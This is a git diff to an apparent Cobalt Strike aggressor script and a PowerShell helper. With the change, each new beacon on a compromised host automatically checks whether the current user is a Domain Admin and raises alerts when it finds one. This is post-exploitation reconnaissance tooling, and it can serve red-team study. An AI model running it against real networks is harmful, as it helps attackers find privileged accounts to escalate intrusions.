diff --git a/Initial-DACheck.cna b/Initial-DACheck.cna index 5e83bd6..8228c52 100644 --- a/Initial-DACheck.cna +++ b/Initial-DACheck.cna @@ -1,29 +1,47 @@ # quickly run Powerview sub powerview { - bpowershell_import($1, script_resource("powerview.ps1")); + bpowershell_import($1, script_resource("Invoke-DACheck.ps1")); } -alias getda { +popup beacon { + # menu definitions above this point + insert_menu("view", $1); + + # menu definitions below this point +} + +alias checkda { powerview($1); - bpowershell($1, '$a = Get-NetGroupMember -GroupName "Domain Admins"; $a.MemberName'); - on beacon_output { - $s = replace($2, 'received output:\n'.''); - println($s); - break; - } + bpowershell($1, 'Invoke-DACheck'); } # register the GetDa command beacon_command_register( - "getda", - "Gathers the DA list of users", - "Synopsis: echo [arguments]\n\nLog arguments to the beacon console"); + "checkda", + "Checks if the current user is in the DA Group", + "Synopsis: echo [no arguments]\n\nChecks using Powershell that supports (2.0 or later with 3.5 .NET) \n or (PS 4.0 or later) to perform Domain Group queries."); # set up the Initial check on beacon_initial { - bsleep($1, 0, 0); + powerview($1); + bpowershell($1, 'Invoke-DACheck'); } +# set up event consumer to search for specfic pattern +# if found alert them via Elog and box +on beacon_output { + $s = replace($2, 'received output:\n'.''); + println($s); + $f = "Found-DA-User:"; + if ($f isin $s) + { + $pid = binfo($1, "pid"); + elog("Found DA User at Pid: $pid"); + show_message("Found DA User at Pid: $pid"); + beacon_note($1, "DA User on this box"); + } + } + # bpowershell($1, '$user = [Security.Principal.WindowsIdentity]::GetCurrent();(New-Object Security.Principal. # WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)'); diff --git a/Invoke-DACheck.ps1 b/Invoke-DACheck.ps1 index 8bab1e7..096ece6 100644 --- a/Invoke-DACheck.ps1 +++ b/Invoke-DACheck.ps1 @@ -3,6 +3,11 @@ function Invoke-DACheck { .SYNOPSIS Checks to see if current user is in DA Groups and if he is returns a specfic string alerting user that they are DA for Automated purposes. #> + [CmdletBinding()] + param( + [Parameter(ValueFromPipeline=$True)] + [string]$Command + ) process { $User = Get-User $DomainAdmins = Get-DomainAdmins @@ -38,7 +43,7 @@ function Get-DomainAdmins { process { $Ver = $PSVersionTable.PSVersion - If ($Ver.Major -eq 4) + If ($Ver.Major -gt 4) { $DAobj = Get-ADGroupMember -Identity ‘Domain Admins’ return $DAobj.name @@ -69,4 +74,4 @@ function Get-User { $User = $User.trimstart("\") return $User } -} +} \ No newline at end of file